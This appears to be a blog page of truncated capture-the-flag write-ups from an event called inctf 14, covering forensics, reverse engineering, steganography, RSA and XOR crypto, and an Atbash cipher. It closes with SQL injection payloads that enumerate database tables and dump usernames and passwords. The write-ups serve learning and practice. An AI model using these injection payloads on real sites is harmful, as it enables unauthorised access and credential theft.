Learn _ Play _

Given a partition needed to mount and get the flag. root@Vijay:~/Desktop/inctf 14/forensics# file Forensics-8 Forensics-8: x86 boot sector; partition 1: ID=0xc, starthead 0, startsector 1, 97656 sectors, code offset 0xb8 root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# root@Vijay:~/Desktop/inctf 14/forensics# gparted Forensics-8 ====================== libparted : 2.3 ====================== root@Vijay:~/Desktop/inctf 14/forensics# parted Forensics-8 GNU Parted 2.3 Using /root/Desktop/inctf 14/forensics/Forensics-8 Welcome to GNU Parted! Type 'help' to view a list of commands. (parted) unit                                                             Unit?  [compact]? B                                                       (parted)                                                                 (parted) print                                                           Model:  (file) Disk

1. First Challenge was given python compiled File Used Python decompiler to get the original code. root@Vijay:~/Desktop/inctf 14/reverse# file one one: python 2.7 byte-compiled I got the printable sequence array values. eflag = [131, ... 138, ... 219, ... 198, ... 201, ... 158, ... 151, ... 154, ... 134, ... 129, ... 128, ... 177, ... 135, ... 157, ... 177, ... 157, ... 154, ... 135, ... 130, ... 130, ... 177, ... 141, ... 129, ... 129, ... 130, ... 201, ... 199] >>> eflag [131, 138, 219, 198, 201, 158, 151, 154, 134, 129, 128, 177, 135, 157, 177, 157, 154, 135, 130, 130, 177, 141, 129, 129, 130, 201, 199] >>> >>> flag = ''.join(map(chr, map(lambda x: x ^ 238, eflag))) >>> >>> print flag md5('python_is_still_cool') Next is the compiled java class file, I used jad decompiler to get the original class file root@Vijay:~/Desktop/inctf 14/reverse# file two.class two.class: compiled Java

Hi this is my first reverse engineering with GDB. Challenge was to get the flag from the display_function. First we should disassemble the executable file with objdump to see how the program control works. root@Vijay:~/Desktop/inctf 14/reverse# objdump -d four four: file format elf32-i386 Disassembly of section .init: 080482f4 <_init>: 80482f4: 53 push %ebx 80482f5: 83 ec 08 sub $0x8,%esp 80482f8: e8 b3 00 00 00 call 80483b0 <__x86.get_pc_thunk.bx> 80482fd: 81 c3 03 1d 00 00 add $0x1d03,%ebx 8048303: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax 8048309: 85 c0 test %eax,%eax 804830b: 74 05 je 8048312 <_init+0x1e> 804830d: e8 3e 00 00 00 call 8048350 <__gmon_start__@plt> 8048312: 83 c4 08 add $0x8,%esp 8048315: 5b pop %ebx 8048316: c3 ret Disassembly of section .plt: 08048320 : 8

Give an image, the flag is hidden in the Blue plane. import os,sys import Image modi_bin = Image.open("modi.png").convert('RGB') bin = '' R = open('r.txt','w') G = open('g.txt','w') B = open('b.txt','w') # By Analysing the text docs I found blue Plane First column is embedded with data flag = '' flag1 = '' for h in range(modi_bin.size[1]): # Fetches Height count = 0 binR = '' binG = '' binB = '' for w in range(modi_bin.size[0]): # Fetches Width count += 1 binR += str(modi_bin.getpixel((w,h))[0] & 1) binG += str(modi_bin.getpixel((w,h))[1] & 1) binB += str(modi_bin.getpixel((w,h))[2] & 1) if w == 0: # blue plane first bit flag += str(modi_bin.getpixel((w,h))[2] & 1) if count == 8: R.write(binR) G.write(binG) B.write(binB) binR=' ';binG=' ';binB=' ' count = 0 R.write(binR+'\n') G.

This is also a RSA challenge which is more interesting, given a RSA-704 bit. Factors are found in the wiki. I used openssl to finish, this challenge. root@Vijay:# openssl rsa -inform PEM -text -pubin -in publickey.pem -modulus Public-Key: (704 bit) Modulus: 00:e1:34:18:93:fe:6e:68:16:ce:c8:a9:70:a3:9c: 00:fa:54:7c:7d:a2:cd:ed:ab:0a:62:b9:1c:46:51: a8:3f:96:38:0b:cf:ae:e2:6f:7e:86:61:07:90:63: 89:42:1b:1e:68:d0:a1:7a:ad:c9:87:0b:98:58:e9: 56:28:6e:39:99:e9:8c:ec:98:81:53:4a:c7:72:ae: 78:f5:e8:ab:a1:e2:f8:d3:03:95:77:02:9d:87 Exponent: 65537 (0x10001) Modulus=E1341893FE6E6816CEC8A970A39C00FA547C7DA2CDEDAB0A62B91C4651A83F96380BCFAEE26F7E866107906389421B1E68D0A17AADC9870B9858E956286E3999E98CEC9881534AC772AE78F5E8ABA1E2F8D3039577029D87 writing RSA key -----BEGIN PUBLIC KEY----- MHQwDQYJKoZIhvcNAQEBBQADYwAwYAJZAOE0GJP+bmgWzsipcKOcAPpUfH2ize2r CmK5HEZRqD+WOAvPruJvfoZhB5BjiUIbHmjQoXqtyYcLmFjpVihuOZnpjOyYgVNK x3KuePXoq6Hi+NMDlXcCnYcCAwEAAQ== -----END PUBLIC KEY-

This challenge had made me mad, Some how I finally I managed to solve the challenge. This is a RSA Crypto, given a cipher and public key. This is RSA low public exponent attack, e=3. root@Vijay:# openssl rsa -pubin -in pub.pem -text -noout -modulus Public-Key: (4096 bit) Modulus: 00:d1:0b:a0:e9:cd:6d:d6:c3:89:5f:cd:f4:17:db: 21:e5:81:22:60:89:c6:c7:58:7f:c4:1b:3d:78:df: f5:2c:0f:8c:29:dc:6b:e9:fc:cf:31:68:32:e6:ff: 6f:f0:49:6e:9e:56:6e:cb:c1:31:06:4e:b8:47:5d: 6c:1b:c8:28:be:4a:f4:54:ad:62:cb:f0:d1:d2:cd: 5a:59:8a:24:1c:52:b1:6d:8e:e1:da:0c:a9:cc:56: 30:3c:d0:70:71:0e:6c:18:1f:2a:31:c6:88:7e:52: cf:14:bd:76:f6:25:80:a8:46:92:f8:81:98:a9:38: 49:0f:b2:de:19:41:b1:10:85:83:3d:ed:ca:16:67: 3f:4a:e5:4b:e6:0f:e0:da:66:24:a5:3d:b2:32:dc: a6:c5:88:7d:72:3c:77:39:c4:76:ef:30:60:19:a0: 57:f1:c6:be:37:a5:b8:20:d0:91:9a:cf:fd:18:63: d2:2c:6f:a7:30:fe:12:e8:15:35:9d:68:a4:ec:e1: c0:1e:f7:b0:ec:d9:59:91:b3:d9:71:d0:09:27:99: 5e:d6:6e:d

There are three files, one.txt, one.txt.enc and second.txt.enc. Challenge is to decrypt the second.txt.enc using the key. So we got a message + cipher, so we got a hint that operation done using XOR. So XORing (Message ^ Cipher) = Key. #!/usr/bin/env python import hashlib """ one.txt This sentence is encrypted using XOR cipher. """ plain_text = open('one.txt','r').read().strip() """ one.txt.enc LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE= """ cipher_text = open('one.txt.enc','r').read().decode("base64") print plain_text print '---------------------------------------------------------------------' print cipher_text print '---------------------------------------------------------------------' plain_text = [ord(i) for i in plain_text] cipher_text = [ord(i) for i in cipher_text] key = '' for i in range(len(plain_text)): c = ((plain

Question: Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd. Given Hint: The Atbash cipher is a very common, simple cipher. It was for the Hebrew alphabet, but modified here to work with the English alphabet. Basically, when encoded, an "A" becomes a "Z", "B" turns into "Y", etc. The Atbash cipher can be implemented as an Affine cipher by setting both "a" and "b" to 25. We used online  tool http://rumkin.com/tools/cipher/atbash.php  to decrypt the encoded message. This is your encoded/decoded text: Atbash   cipher was originally developed for the Hebrew language. The key for this level is hebrew.

id=4  UNION ALL SELECT 1,2,3 id=4  UNION ALL SELECT 1,table_name,3 from information_schema.tables id=4  UNION ALL SELECT 1,column_name,3 from information_schema.columns id=4  UNION ALL SELECT 1,username,password from users Another is by COOKIES in PHP <query> = '$username' ' UNION ALL SELECT 1,2;# ' UNION ALL SELECT table_name,3 from information_schema.tables;# ' UNION ALL SELECT column_name,1 from information_schema.columns;# ' UNION ALL SELECT login, password from users;# i BASE64 convertor http://www.base64decode.org/ TAMPER DATA in MOZILA browser to inject it